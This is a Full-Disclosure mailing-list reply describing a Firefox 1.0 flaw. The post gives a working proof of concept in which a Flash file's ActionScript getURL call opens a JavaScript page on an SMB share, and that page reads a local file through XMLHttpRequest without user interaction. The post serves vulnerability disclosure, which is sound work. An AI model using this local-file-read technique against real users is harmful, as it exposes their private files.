Re: [Full-Disclosure] Fireflashing [Firefox 1.0]

I took a quick 5 minute look at this, and it looks like you can read arbitrary files with this without requiring any kind of user interaction.

Just create a file called whatever.html on a windows SMB share with this content

--snip--

<script language="javascript">
   var oXML=new XMLHttpRequest();
   oXML.open("GET","file:///C:/jelmer.txt",false);
   oXML.send(null);
   alert(oXML.responseText);
</script>

--snip--

Now create a flash file that opens file://///SOME_IP/SHARENAME/whatever.html
(I just created an empty flash file with a single action that contained the following line of actionscript : getURL ("file://///SOME_IP/SHARENAME/whatever.html", "_self"); )
and presto it will display the contents of c:\jelmer.txt